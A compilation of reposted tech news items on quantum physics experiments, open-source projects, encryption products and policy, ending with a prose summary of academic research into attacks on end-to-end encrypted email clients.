Does the Butterfly Effect Exist? Maybe, But Not in the Quantum Realm – Discover Magazine

In A Sound of Thunder, the short story by Ray Bradbury, the main character travels back in time to hunt dinosaurs. He crushes a butterfly underfoot in the prehistoric jungle, and when he returns to the present, the world he knows is changed: the feel of the air, a sign in an office, the election of a U.S. president. The butterfly was a small thing that could upset balances and knock down a line of small dominoes and then big dominoes and then gigantic dominoes, all down the years across Time.

This butterfly effect that Bradbury illustrated where a small change in the past can result in enormous future effects is not reserved for fiction. As the famed mathematician and meteorologist Edward Lorenz discovered by accident, natural systems do exist in which tiny shifts in initial conditions can lead to highly variable outcomes. These systems, including weather and even how fluids mix are known as chaotic. Chaotic systems are normally understood within the realm of classical physics, which is the method we use to predict how objects will move to a certain degree of accuracy (think motion, force or momentum from your high school science class.)

But a new study shows that the effect doesnt work in a quantum realm. Two researchers at Los Alamos National Labs in New Mexico, created a simulation where a qubit, a quantum bit, moved backwards and forwards in time on a quantum computer. Despite being damaged, the qubit held on to its original information instead of becoming unrecognizable like the time travelers world after he killed the butterfly. In the study, the process used to simulate time travel forwards and backwards is known as evolution.

From the point of view of classical physics, it's very unexpected because classical physics predicts that complex evolution has a butterfly effect, so that small changes deep in the past lead to huge changes in our world, says Nikolai Sinitsyn, a theoretical physicist and one of the researchers who conducted the study.

The finding furthers our understanding of quantum systems, and also has potential applications in securing information systems and even determining the quantum-ness of a quantum processor.

The rules of the quantum realm, which explain how subatomic particles move, can be truly mind-boggling because they defy traditional logic. But briefly: Particles as small as electrons and protons don't just exist in one point in space, they can occupy many at a time. The mathematical framework of quantum mechanics tries to explain the motion of these particles.

The laws of quantum mechanics can also be applied to quantum computers. These are very different from computers we use today, and can solve certain problems exponentially faster than normal computers can because they adhere to these completely different laws of physics. A standard computer uses bits with a value of either 0 or 1. A quantum computer uses qubits, which can attain a kind of combined state of 0 or 1, a unique characteristic of quantum systems for example, an electron called superposition.

In a quantum system, small changes to qubits even looking at or measuring them can have immense effects. So in the new study, the researchers wanted to see what would happen when they simulated sending a qubit back in time while also damaging it. Researchers constructing quantum experiments often use the stand-ins Alice and Bob to illustrate their theoretical process. In this case, they let Alice bring her qubit back in time, scrambling the information as part of what they call reverse evolution. Once in the past, Bob, an intruder, measures Alices qubit, changing it. Alice brings her qubit forward in time.

If the butterfly effect had held, the original information in Alices qubit would have been exponentially changed. But instead, the evolution forward in time allowed Alice to recover the original information, even though Bobs intrusion had destroyed all the connections between her qubit and others that travelled with hers.

So normally, many people believe that if you go back in time, and scramble the information, that information is lost forever, says Jordan Kyriakidis, an expert in quantum computing and former physicist at Dalhousie University in Nova Scotia. What they have shown in this paper is that for quantum systems, that under certain circumstances, if you go back in time, you can recover the original information even though someone tried to scramble it on you.

So does this mean that the butterfly effect doesnt exist at all? No. Sinitsyn and his coauthor, Bin Yan, showed it doesnt exist within the quantum realm, specifically.

But this does have implications for real-world problems. One is information encryption. Encryption has two important principles: It should be hidden so well that no one can get to it, but who it was intended for should to be able to reliably decipher it. For example, explains Kyriakidis, if a hacker attempts to crack a code that hides information in todays world, the hacker might not be able to get to it, but they could damage it irreparably, preventing anyone from reading the original message. This study may point to a way to avoid this by protecting information, even after its damaged, so the intended recipient can interpret it.

And because this effect (or non-effect) is so particular to quantum systems, it could theoretically be used to test the integrity of a quantum computer. If one were to replicate Yan and Sinitsyns protocol in a quantum computer, according to the study, it would confirm that the system was truly operating by quantum principles. Because quantum computers are highly prone to errors, a tool to easily test how well they work has huge value. A reliable quantum computer can solve incredibly complex problems, which have applications from chemistry and medicine to traffic direction and financial strategy.

Quantum computing is only in its birth but if Yan and Sinitsyns quantum time machine can exist in a realm usually saved for subatomic particles, well, the possibilities could be endless.

Link:
Does the Butterfly Effect Exist? Maybe, But Not in the Quantum Realm - Discover Magazine

Quantum Computing Market: Size,Share,Analysis,Regional Outlook and Forecast 202 – News by aeresearch

Global Quantum Computing market Size study report with COVID-19 effect is considered to be an extremely knowledgeable and in-depth evaluation of the present industrial conditions along with the overall size of the Quantum Computing industry, estimated from 2020 to 2025. The research report also provides a detailed overview of leading industry initiatives, potential market share of Quantum Computing , and business-oriented planning, etc. The study discusses favorable factors related to current industrial conditions, levels of growth of the Quantum Computing market, demands, differentiable business-oriented approaches used by the manufacturers of the Quantum Computing industry in brief about distinct tactics and futuristic prospects.

The latest report on Quantum Computing market is drafted with an aim to provide competitive edge to organizations operating in this business space by thorough analysis of global trends. The document enables companies to understand prevailing market dynamics as well as growth prospects so as to form important expansion strategies.

The study highlights the main drivers and opportunities which will influence the remuneration of the industry over the forecast period. It further enlists the challenges and threats hampering the market growth and provides recommendations to overcome these hurdles.

Request Sample Copy of this Report @ https://www.aeresearch.net/request-sample/279803

Quantum Computing market report offers a comparative analysis of the past and present business outlook to infer growth rate of the industry over the analysis timeframe. Moreover, an in-depth scrutiny of impact of COVID-19 on the market landscape is entailed in the report, alongside the strategies to guide the industry partakers in converting this global distress into profitability.

Key pointers from table of content:

Product scope

Application spectrum

Regional terrain

Competitive hierarchy:

All in all, the report examines Quantum Computing market qualitatively and quantitively considering different segmentations and focusing on other important aspects such as supply chain and sales channel to infer overall industry augmentation for forecast duration.

Questions Answered by the Report:

Which are the dominant players of the global Quantum Computing market?

What will be the size of the global Quantum Computing market in the coming years?

Which segment will lead the global Quantum Computing market?

How will the market development trends change in the next five years?

What is the nature of the competitive landscape of the global Quantum Computing market?

What are the go-to strategies adopted in the global Quantum Computing market?

Table of Contents:

1 Study Coverage

1.1 Quantum Computing Product Introduction

1.2 Key Market Segments in This Study

1.3 Key Manufacturers Covered: Ranking of Global Top Quantum Computing Manufacturers by Revenue in 2019

1.4 Market by Type

1.4.1 Global Quantum Computing Market Size Growth Rate by Type

1.5 Market by Application

1.5.1 Global Quantum Computing Market Size Growth Rate by Application

1.6 Study Objectives

1.7 Years Considered

2 Executive Summary

2.1 Global Quantum Computing Market Size, Estimates and Forecasts

2.1.1 Global Quantum Computing Revenue Estimates and Forecasts 2015-2026

2.1.2 Global Quantum Computing Production Capacity Estimates and Forecasts 2015-2025

2.1.3 Global Quantum Computing Production Estimates and Forecasts 2015-2025

2.2 Global Quantum Computing , Market Size by Producing Regions: 2015 VS 2020 VS 2025

2.3 Analysis of Competitive Landscape

2.3.1 Manufacturers Market Concentration Ratio (CR5 and HHI)

2.3.2 Global Quantum Computing Market Share by Company Type

2.3.3 Global Quantum Computing Manufacturers Geographical Distribution

2.4 Key Trends for Quantum Computing Markets & Products

2.5 Primary Interviews with Key Quantum Computing Players (Opinion Leaders)

3 Market Size by Manufacturers

3.1 Global Top Quantum Computing Manufacturers by Production Capacity

3.1.1 Global Top Quantum Computing Manufacturers by Production Capacity (2015-2020)

3.1.2 Global Top Quantum Computing Manufacturers by Production (2015-2020)

3.1.3 Global Top Quantum Computing Manufacturers Market Share by Production

3.2 Global Top Quantum Computing Manufacturers by Revenue

3.2.1 Global Top Quantum Computing Manufacturers by Revenue (2015-2020)

3.2.2 Global Top Quantum Computing Manufacturers Market Share by Revenue (2015-2020)

3.2.3 Global Top 10 and Top 5 Companies by Quantum Computing Revenue in 2019

3.3 Global Quantum Computing Price by Manufacturers

3.4 Mergers & Acquisitions, Expansion Plans

Request Customization on This Report @ https://www.aeresearch.net/request-for-customization/279803

Read the original here:
Quantum Computing Market: Size,Share,Analysis,Regional Outlook and Forecast 202 - News by aeresearch

This Twist on Schrdinger’s Cat Paradox Has Major Implications for Quantum Theory – Scientific American

What does it feel like to be both alive and dead?

That question irked and inspired Hungarian-American physicist Eugene Wigner in the 1960s. He was frustrated by the paradoxes arising from the vagaries of quantum mechanicsthe theory governing the microscopic realm that suggests, among many other counterintuitive things, that until a quantum system is observed, it does not necessarily have definite properties. Take his fellow physicist Erwin Schrdingers famous thought experiment in which a cat is trapped in a box with poison that will be released if a radioactive atom decays. Radioactivity is a quantum process, so before the box is opened, the story goes, the atom has both decayed and not decayed, leaving the unfortunate cat in limboa so-called superposition between life and death. But does the cat experience being in superposition?

Wigner sharpened the paradox by imagining a (human) friend of his shut in a lab, measuring a quantum system. He argued it was absurd to say his friend exists in a superposition of having seen and not seen a decay unless and until Wigner opens the lab door. The Wigners friend thought experiment shows that things can become very weird if the observer is also observed, says Nora Tischler, a quantum physicist at Griffith University in Brisbane, Australia.

Now Tischler and her colleagues have carried out a version of the Wigners friend test. By combining the classic thought experiment with another quantum head-scratcher called entanglementa phenomenon that links particles across vast distancesthey have also derived a new theorem, which they claim puts the strongest constraints yet on the fundamental nature of reality. Their study, which appeared in Nature Physics on August 17, has implications for the role that consciousness might play in quantum physicsand even whether quantum theory must be replaced.

The new work is an important step forward in the field of experimental metaphysics, says quantum physicist Aephraim Steinberg of the University of Toronto, who was not involved in the study. Its the beginning of what I expect will be a huge program of research.

Until quantum physics came along in the 1920s, physicists expected their theories to be deterministic, generating predictions for the outcome of experiments with certainty. But quantum theory appears to be inherently probabilistic. The textbook versionsometimes called the Copenhagen interpretationsays that until a systems properties are measured, they can encompass myriad values. This superposition only collapses into a single state when the system is observed, and physicists can never precisely predict what that state will be. Wigner held the then popular view that consciousness somehow triggers a superposition to collapse. Thus, his hypothetical friend would discern a definite outcome when she or he made a measurementand Wigner would never see her or him in superposition.

This view has since fallen out of favor. People in the foundations of quantum mechanics rapidly dismiss Wigners view as spooky and ill-defined because it makes observers special, says David Chalmers, a philosopher and cognitive scientist at New York University. Today most physicists concur that inanimate objects can knock quantum systems out of superposition through a process known as decoherence. Certainly, researchers attempting to manipulate complex quantum superpositions in the lab can find their hard work destroyed by speedy air particles colliding with their systems. So they carry out their tests at ultracold temperatures and try to isolate their apparatuses from vibrations.

Several competing quantum interpretations have sprung up over the decades that employ less mystical mechanisms, such as decoherence, to explain how superpositions break down without invoking consciousness. Other interpretations hold the even more radical position that there is no collapse at all. Each has its own weird and wonderful take on Wigners test. The most exotic is the many worlds view, which says that whenever you make a quantum measurement, reality fractures, creating parallel universes to accommodate every possible outcome. Thus, Wigners friend would split into two copies and, with good enough supertechnology, he could indeed measure that person to be in superposition from outside the lab, says quantum physicist and many-worlds fan Lev Vaidman of Tel Aviv University.

The alternative Bohmian theory (named for physicist David Bohm) says that at the fundamental level, quantum systems do have definite properties; we just do not know enough about those systems to precisely predict their behavior. In that case, the friend has a single experience, but Wigner may still measure that individual to be in a superposition because of his own ignorance. In contrast, a relative newcomer on the block called the QBism interpretation embraces the probabilistic element of quantum theory wholeheartedly (QBism, pronounced cubism, is actually short for quantum Bayesianism, a reference to 18th-century mathematician Thomas Bayess work on probability.) QBists argue that a person can only use quantum mechanics to calculate how to calibrate his or her beliefs about what he or she will measure in an experiment. Measurement outcomes must be regarded as personal to the agent who makes the measurement, says Ruediger Schack of Royal Holloway, University of London, who is one of QBisms founders.According to QBisms tenets, quantum theory cannot tell you anything about the underlying state of reality, nor can Wigner use it to speculate on his friends experiences.

Another intriguing interpretation, called retrocausality, allows events in the future to influence the past. In a retrocausal account, Wigners friend absolutely does experience something, says Ken Wharton, a physicist at San Jose State University, who is an advocate for this time-twisting view. But that something the friend experiences at the point of measurement can depend upon Wigners choice of how to observe that person later.

The trouble is that each interpretation is equally goodor badat predicting the outcome of quantum tests, so choosing between them comes down to taste. No one knows what the solution is, Steinberg says. We dont even know if the list of potential solutions we have is exhaustive.

Other models, called collapse theories, do make testable predictions. These models tack on a mechanism that forces a quantum system to collapse when it gets too bigexplaining why cats, people and other macroscopic objects cannot be in superposition. Experiments are underway to hunt for signatures of such collapses, but as yet they have not found anything. Quantum physicists are also placing ever larger objects into superposition: last year a team in Vienna reported doing so with a 2,000-atom molecule. Most quantum interpretations say there is no reason why these efforts to supersize superpositions should not continue upward forever, presuming researchers can devise the right experiments in pristine lab conditions so that decoherence can be avoided. Collapse theories, however, posit that a limit will one day be reached, regardless of how carefully experiments are prepared. If you try and manipulate a classical observera human, sayand treat it as a quantum system, it would immediately collapse, says Angelo Bassi, a quantum physicist and proponent of collapse theories at the University of Trieste in Italy.

Tischler and her colleagues believed that analyzing and performing a Wigners friend experiment could shed light on the limits of quantum theory. They were inspired by a new wave of theoretical and experimental papers that have investigated the role of the observer in quantum theory by bringing entanglement into Wigners classic setup. Say you take two particles of light, or photons, that are polarized so that they can vibrate horizontally or vertically. The photons can also be placed in a superposition of vibrating both horizontally and vertically at the same time, just as Schrdingers paradoxical cat can be both alive and dead before it is observed.

Such pairs of photons can be prepared togetherentangledso that their polarizations are always found to be in the opposite direction when observed. That may not seem strangeunless you remember that these properties are not fixed until they are measured. Even if one photon is given to a physicist called Alice in Australia, while the other is transported to her colleague Bob in a lab in Vienna, entanglement ensures that as soon as Alice observes her photon and, for instance, finds its polarization to be horizontal, the polarization of Bobs photon instantly syncs to vibrating vertically. Because the two photons appear to communicate faster than the speed of lightsomething prohibited by his theories of relativitythis phenomenon deeply troubled Albert Einstein, who dubbed it spooky action at a distance.

These concerns remained theoretical until the 1960s, when physicist John Bell devised a way to test if reality is truly spookyor if there could be a more mundane explanation behind the correlations between entangled partners. Bell imagined a commonsense theory that was localthat is, one in which influences could not travel between particles instantly. It was also deterministic rather than inherently probabilistic, so experimental results could, in principle, be predicted with certainty, if only physicists understood more about the systems hidden properties. And it was realistic, which, to a quantum theorist, means that systems would have these definite properties even if nobody looked at them. Then Bell calculated the maximum level of correlations between a series of entangled particles that such a local, deterministic and realistic theory could support. If that threshold was violated in an experiment, then one of the assumptions behind the theory must be false.

Such Bell tests have since been carried out, with a series of watertight versions performed in 2015, and they have confirmed realitys spookiness. Quantum foundations is a field that was really started experimentally by Bells [theorem]now over 50 years old. And weve spent a lot of time reimplementing those experiments and discussing what they mean, Steinberg says. Its very rare that people are able to come up with a new test that moves beyond Bell.

The Brisbane teams aim was to derive and test a new theorem that would do just that, providing even stricter constraintslocal friendliness boundson the nature of reality. Like Bells theory, the researchers imaginary one is local. They also explicitly ban superdeterminismthat is, they insist that experimenters are free to choose what to measure without being influenced by events in the future or the distant past. (Bell implicitly assumed that experimenters can make free choices, too.) Finally, the team prescribes that when an observer makes a measurement, the outcome is a real, single event in the worldit is not relative to anyone or anything.

Testing local friendliness requires a cunning setup involving two superobservers, Alice and Bob (who play the role of Wigner), watching their friends Charlie and Debbie. Alice and Bob each have their own interferometeran apparatus used to manipulate beams of photons. Before being measured, the photons polarizations are in a superposition of being both horizontal and vertical. Pairs of entangled photons are prepared such that if the polarization of one is measured to be horizontal, the polarization of its partner should immediately flip to be vertical. One photon from each entangled pair is sent into Alices interferometer, and its partner is sent to Bobs. Charlie and Debbie are not actually human friends in this test. Rather, they are beam displacers at the front of each interferometer. When Alices photon hits the displacer, its polarization is effectively measured, and it swerves either left or right, depending on the direction of the polarization it snaps into. This action plays the role of Alices friend Charlie measuring the polarization. (Debbie similarly resides in Bobs interferometer.)

Alice then has to make a choice: She can measure the photons new deviated path immediately, which would be the equivalent of opening the lab door and asking Charlie what he saw. Or she can allow the photon to continue on its journey, passing through a second beam displacer that recombines the left and right pathsthe equivalent of keeping the lab door closed. Alice can then directly measure her photons polarization as it exits the interferometer. Throughout the experiment, Alice and Bob independently choose which measurement choices to make and then compare notes to calculate the correlations seen across a series of entangled pairs.

Tischler and her colleagues carried out 90,000 runs of the experiment. As expected, the correlations violated Bells original boundsand crucially, they also violated the new local-friendliness threshold. The team could also modify the setup to tune down the degree of entanglement between the photons by sending one of the pair on a detour before it entered its interferometer, gently perturbing the perfect harmony between the partners. When the researchers ran the experiment with this slightly lower level of entanglement, they found a point where the correlations still violated Bells bound but not local friendliness. This result proved that the two sets of bounds are not equivalent and that the new local-friendliness constraints are stronger, Tischler says. If you violate them, you learn more about reality, she adds. Namely, if your theory says that friends can be treated as quantum systems, then you must either give up locality, accept that measurements do not have a single result that observers must agree on or allow superdeterminism. Each of these options has profoundand, to some physicists, distinctly distastefulimplications.

The paper is an important philosophical study, says Michele Reilly, co-founder of Turing, a quantum-computing company based in New York City, who was not involved in the work. She notes that physicists studying quantum foundations have often struggled to come up with a feasible test to back up their big ideas. I am thrilled to see an experiment behind philosophical studies, Reilly says. Steinberg calls the experiment extremely elegant and praises the team for tackling the mystery of the observers role in measurement head-on.

Although it is no surprise that quantum mechanics forces us to give up a commonsense assumptionphysicists knew that from Bellthe advance here is that we are a narrowing in on which of those assumptions it is, says Wharton, who was also not part of the study. Still, he notes, proponents of most quantum interpretations will not lose any sleep. Fans of retrocausality, such as himself, have already made peace with superdeterminism: in their view, it is not shocking that future measurements affect past results. Meanwhile QBists and many-worlds adherents long ago threw out the requirement that quantum mechanics prescribes a single outcome that every observer must agree on.

And both Bohmian mechanics and spontaneous collapse models already happily ditched locality in response to Bell. Furthermore, collapse models say that a real macroscopic friend cannot be manipulated as a quantum system in the first place.

Vaidman, who was also not involved in the new work, is less enthused by it, however, and criticizes the identification of Wigners friend with a photon. The methods used in the paper are ridiculous; the friend has to be macroscopic, he says. Philosopher of physics Tim Maudlin of New York University, who was not part of the study, agrees. Nobody thinks a photon is an observer, unless you are a panpsychic, he says. Because no physicist questions whether a photon can be put into superposition, Maudlin feels the experiment lacks bite. It rules something outjust something that nobody ever proposed, he says.

Tischler accepts the criticism. We dont want to overclaim what we have done, she says. The key for future experiments will be scaling up the size of the friend, adds team member Howard Wiseman, a physicist at Griffith University. The most dramatic result, he says, would involve using an artificial intelligence, embodied on a quantum computer, as the friend. Some philosophers have mused that such a machine could have humanlike experiences, a position known as the strong AI hypothesis, Wiseman notes, though nobody yet knows whether that idea will turn out to be true. But if the hypothesis holds, this quantum-based artificial general intelligence (AGI) would be microscopic. So from the point of view of spontaneous collapse models, it would not trigger collapse because of its size. If such a test was run, and the local-friendliness bound was not violated, that result would imply that an AGIs consciousness cannot be put into superposition. In turn, that conclusion would suggest that Wigner was right that consciousness causes collapse. I dont think I will live to see an experiment like this, Wiseman says. But that would be revolutionary.

Reilly, however, warns that physicists hoping that future AGI will help them home in on the fundamental description of reality are putting the cart before the horse. Its not inconceivable to me that quantum computers will be the paradigm shift to get to us into AGI, she says. Ultimately, we need a theory of everything in order to build an AGI on a quantum computer, period, full stop.

That requirement may rule out more grandiose plans. But the team also suggests more modest intermediate tests involving machine-learning systems as friends, which appeals to Steinberg. That approach is interesting and provocative, he says. Its becoming conceivable that larger- and larger-scale computational devices could, in fact, be measured in a quantum way.

Renato Renner, a quantum physicist at the Swiss Federal Institute of Technology Zurich (ETH Zurich), makes an even stronger claim: regardless of whether future experiments can be carried out, he says, the new theorem tells us that quantum mechanics needs to be replaced. In 2018 Renner and his colleague Daniela Frauchiger, then at ETH Zurich, published a thought experiment based on Wigners friend and used it to derive a new paradox. Their setup differs from that of the Brisbane team but also involves four observers whose measurements can become entangled. Renner and Frauchiger calculated that if the observers apply quantum laws to one another, they can end up inferring different results in the same experiment.

The new paper is another confirmation that we have a problem with current quantum theory, says Renner, who was not involved in the work. He argues that none of todays quantum interpretations can worm their way out of the so-called Frauchiger-Renner paradox without proponents admitting they do not care whether quantum theory gives consistent results. QBists offer the most palatable means of escape, because from the outset, they say that quantum theory cannot be used to infer what other observers will measure, Renner says. It still worries me, though: If everything is just personal to me, how can I say anything relevant to you? he adds. Renner is now working on a new theory that provides a set of mathematical rules that would allow one observer to work out what another should see in a quantum experiment.

Still, those who strongly believe their favorite interpretation is right see little value in Tischlers study. If you think quantum mechanics is unhealthy, and it needs replacing, then this is useful because it tells you new constraints, Vaidman says. But I dont agree that this is the casemany worlds explains everything.

For now, physicists will have to continue to agree to disagree about which interpretation is best or if an entirely new theory is needed. Thats where we left off in the early 20th centurywere genuinely confused about this, Reilly says. But these studies are exactly the right thing to do to think through it.

Disclaimer: The author frequently writes for the Foundational Questions Institute, which sponsors research in physics and cosmologyand partially funded the Brisbane teams study.

Originally posted here:
This Twist on Schrdinger's Cat Paradox Has Major Implications for Quantum Theory - Scientific American

GitHub’s ReadME Project highlights the developers and teams behind open source software – SDTimes.com

GitHub today announced the ReadME Project, a new space designed to share and highlight open-source stories that are moving humanity forward. According to the company, while 99% of the software that powers the world is built on open-source code, the maintainers and developers of the code often go unnoticed.

We read a lot about the preeminence of software, less so about the communities of people pouring their efforts and passions into it, Brian Douglas, senior developer advocate at GitHub, wrote in a post. Today, and throughout the coming months, youll read stories of personal growth, professional challenges, and lessons learnedthe journeys you might not see behind projects you probably use every day.

RELATED CONTENT:What does it take to commit to 100% open source?

Open-source users can nominate inspiring developers to be highlighted. Among the first highlighted developers include:

We hope you take something constructive from these personal profiles and merge it with your own story. Open source is incredible, uplifting, and collaborative, but its also imperfect. All of us can learn from the creativity, grit, and perseverance of the individuals who build it, Douglas wrote. The ReadME Project features the stories of the people behind open source.

Read the original:
GitHub's ReadME Project highlights the developers and teams behind open source software - SDTimes.com

SD Times Open-Source Project of the Week: OpenEEW – SDTimes.com

This weeks highlighted open-source project is OpenEEW, which is an open source version of Grillos earthquake early-warning (EEW) system, designed to sense, detect, and analyze earthquakes, then alert affected communities.

The project was recently accepted into the Linux Foundation. The Linux Foundation in collaboration with IBM will work to accelerate the standardization and deployment of EEW systems to make communities more prepared for earthquakes.

The project was developed as a way to reduce the costs of EEW systems, accelerate deployments around the world, and save lives.

For years we have seen that EEWs have only been possible with very significant governmental financing, due to the cost of dedicated infrastructure and development of algorithms. We expect that OpenEEW will reduce these barriers and work towards a future where everyone who lives in seismically-active areas can feel safe, said Andres Meira, founder of Grillo.

The OpenEEW Project includes hardware that can detect and transmit ground motion, real-time detection systems that can be deployed on various platforms like a Kubernetes cluster or a Raspberry Pi, and applications that allow users to receive alerts on devices, wearables, or mobile apps.

To further the project, open source contributors can contribute to the three main OpenEEW components: deploying sensors, detecting earthquakes, and sending alerts.

According to the Linux Foundation, Grillos sensors have generated over 1 TB of data since 2017, including information from earthquakes of magnitudes 6 and 7. This data was collected in Mexico, Chile, Puerto Rico, and Costa Rica. That data is currently being utilized by Harvard University and University of Oregon researchers to develop new machine learning earthquake characterization and detection methods.

Understanding the ground on which Mexico City is built is an important facet of earthquake hazards. With support from the David Rockefeller Center for Latin American Studies at Harvard University and the David and Lucile Packard Foundation, we are working with Grillo to deploy a dense network of sensors across Mexico City and analyze the seismic behavior and local seismicity beneath the ancient lake basin. Our collaboration also enables open source software development for the next generation of seismology on the cloud, said Maine Denolle, professor at Harvard.

Read this article:
SD Times Open-Source Project of the Week: OpenEEW - SDTimes.com

Live Webinar – The Future of Open Source Software Support – Computerworld

Open source is fundamental to modern software development.Over 90% of applications today contain open source components. Open source helps organizations move faster by allowing them to take advantage of billions of lines of code developed and shared by an open community of collaborators.

But as organizations use more and more open source, one nagging question continues to come up: whos on the hook to support all that code?

Over the past 20 years, guest speaker Al Gillen of IDC has been studying the rise of open source and the numerous methods organizations have employed to ensure the open source code they are using is supported and maintained. Recently hes been exploring new emerging models for open source support, and recently named Tidelift an IDC Innovator in this area.

Join us on Wednesday, September 9 at 11 a.m. PST as IDC analyst Al Gillen explains the history of open source support models and his thoughts about the future of open source support. Hell be joined by Tidelift CEO and co-founder Donald Fischer.

During this webinar, Al and Donald will share:

See more here:
Live Webinar - The Future of Open Source Software Support - Computerworld

NordLocker encryption heads to the cloud – IT PRO

NordLocker, the file encryption tool from NordSec - the company behind the well-known NordVPN-has enhanced its offering with encrypted cloud storage.

NordLocker has always protected user files on a device, and the new cloud storage feature allows users to move their data to the cloud without fear of hackers stealing it. This is a critical feature for modern business, especially with the coronavirus outbreak forcing many companies workforces to remain remote.

There are plenty of cloud-storage options boasting encryption, but NordSecs add-on takes it a step further. Other cloud-storage solutions encrypt the storage itself, but your files are still vulnerable if a hacker breaks through the clouds encryption. With NordSec, your files are encrypted too, giving you double protection.

Plus, the encryption standards on your device are shared with the cloud add-on. Nord Locker also limits file access to the owner and whoever the owner shares access with. With some other encrypted cloud storage options, the company offering the storage can also access the files.

According to Oliver Nobel, encryption specialist at NordLocker:"Your data is not our business. Our encryption system is designed in a way that prevents us from seeing what you keep."

Whether you need to protect photos, videos, cryptocurrencies, notes or any other files for your business or yourself, NordLocker claims to protect it all.

The NordLocker clouds drag-and-drop interface makes it relatively easy to use, even for folks with limited tech knowledge. Users can also access their files from any computer with NordLocker installed, so theres no need to panic if you switch to a new computer or need to download a piece of software when youre away from the office.

NordLocker offers a free 3GB cloud storage plan with unlimited encryption -no credit card required. If you need more space, you can upgrade to 500GB of cloud storage for $3.00 per month. There are also customizable business accounts for larger companies.

Key considerations for implementing secure telework at scale

Identifying the security risks and advanced requirements of a remote workforce

The State of Salesforce 2020

Your guide to getting the most from Salesforce

Fast, flexible and compliant e-signatures for global businesses

Be at the forefront of digital transformation with electronic signatures

Rethink your cybersecurity strategy for the new world

5 steps to secure the enterprise and be fit for a flexible future

View post:
NordLocker encryption heads to the cloud - IT PRO

Encryption and endpoint control: the heroes of post-lockdown data security – TEISS

Remote working is still the norm within many organisations, and will become a permanent model for some, potentially increasing cyber-risk at a time when regulatory powers grow ever stronger. Against this backdrop, organisations are increasingly turning towards the encryption of data, along with additional endpoint controls, to manage risk.

Even with appropriate security software and firewalls in place, the human threat persists. In Apricorns annual survey into organisations attitudes towards data breaches, more than half (57 percent) ofUK IT decision makerssaid they expect remote workers to expose their organisation to the risk of a data breach. Employees unintentionally putting data at risk remains the leading cause of a data breach, with lost or misplaced devices the second biggest cause.

More and more organisations are mitigating these concerns by implementing greater data encryption and strengthening endpoint controls.

Locking down the data

When asked whether theyd seen an increase in the implementation of encryption in their organisation since GDPR was enforced, 41% of survey respondents said they had.

Legislation hasnt taken a break over lockdown either, and data encryption a simple step towards GDPR compliance by safeguarding personal data. The regulation has clear mandates for encryption within Article 32, while Article 34 removes the obligation to individually inform each citizen affected by a data breach if encryption has been applied. Article 83 suggests that fines will be moderated where a company can show it has been responsible and mitigated damage suffered by data subjects.

The first step to ensuring data is encrypted as standard across the organisation is to enshrine the requirement in company security policy and enforce it wherever possible through technology. Two thirds of IT leaders said their organisation now has a policy of hardware encrypting all information, whether its at rest or in transit. Nearly all (94 percent) have a policy that requires encryption of all data held on removable media such as USB sticks and portable hard drives a big rise from 66 percent in 2019. Of these, 57 percent use hardware encryption, which is seen as the gold standard.

Hardware encryption offers much greater security than software encryption and PIN pad authenticated, hardware encrypted USB storage devices offer additional, significant benefits. Being software-free eliminates the risk of software hacking and keylogging; all authentication and encryption processes take place within the device itself, so passwords and key data are never shared with a host computer. This makes it particularly suited for use in highly regulated sectors such as defence, finance, government and healthcare.

By deploying removable storage devices with built-in hardware encryption, a business can roll this approach out across the workforce, ensuring all data can be stored or moved around safely offline. Even if the device is lost or stolen, the information will be unintelligible to anyone not authorised to access it.

Locking down the endpoint

With employees typically using a mix of personal and corporate devices to access data, systems and networks, businesses need to have confidence that the endpoint as well as the data is secure.

Every organisation should cover the use of employees own IT equipment for mobile and remote working in their information security strategy. Forty two percent of UK IT leaders say that their organisations only permit the use of corporate IT provisioned or approved devices, and have strict security measures in place to enforce this with endpoint control, a huge rise compared with 11 percent in 2019.

There is room for improvement in this area, however: 6% of organisations dont cover shadow IT in their information security strategy, while 7% tell employees theyre not allowed to use removable media, but dont have technology in place to prevent this.

At a time when such a large proportion of the workforce is operating outside the confines and relative safety of the office and corporate network, any holes in security policy will create unacceptable risk. All organisations must recognise the importance of endpoint controls and hardware encryption and how they can work together to help comply with data protection regulations and reduce the potential for a breach.

This is more critical than ever: the new societal values shaped by COVID-19 have thrown the importance of doing business responsibly into sharp focus. Preventing a data breach will not only mitigate against the financial costs, it will also protect an organisations reputation and the trust of its customers.

Author: Jon Fielding, managing director EMEA, Apricorn

Original post:
Encryption and endpoint control: the heroes of post-lockdown data security - TEISS

Techdirt Podcast Episode 252: The Key To Encryption – Techdirt

from the or-lack-thereof dept

This week we've got another cross-post, with the latest episode of The Neoliberal Podcast from the Progressive Policy Institute. Host Jeremiah Johnson invited Mike, along with PPI's Alec Stapp, to discuss everything about encryption: the concept itself, the attempts at laws and regulations, and more.

Follow the Techdirt Podcast on Soundcloud, subscribe via iTunes or Google Play, or grab the RSSfeed. You can also keep up with all the latest episodes right here on Techdirt.

Thank you for reading this Techdirt post. With so many things competing for everyones attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community.

Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites especially a site like ours that is unwilling to pull punches in its reporting and analysis.

While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise and every little bit helps. Thank you.

The Techdirt Team

Filed Under: alec stapp, encryption, jeremiah johnson, podcast

More here:
Techdirt Podcast Episode 252: The Key To Encryption - Techdirt

Researchers Develop Attacks Targeting End-to-End Encryption in Emails – Decipher

Attack Types

Researchers were able to show how an adversary could automatically install certificates contained in S/MIME communications. For example, the researchers identified a design flaw in a clients key update mechanism which could be abused to replace the public keys used in encrypted S/MIME communications. The researchers were able to silently replace the encryption key for six S/MIME-supporting email clients.

A man-in-the-middle attack would involve an internet or email provider, or a compromised SMTP or IMAP server.

Email clients could also be tricked into into decrypting ciphertext messages or signing arbitrary messages and then sending them to an IMAP server controlled by the attacker. For three OpenPGP-capable clients, the researchers exfiltrated the plaintext to an IMAP server controlled by an attacker, or misused the clients as signing oracles.

The researchers tested 20 popular email clients, supporting either S/MIME or OpenPGP, from a list of more than 50 clients across major platforms (Windows, Linux, macOS, Android, and iOS), as well as web-based applications. As the table (Table 2 from the paper) shows, researchers were able to replace the keys in the Windows versions of Microsoft Outlook. "For Microsoft Outlook, we could verify theexistence of this dangerous feature since at least Outlook 2007," the researchers wrote.

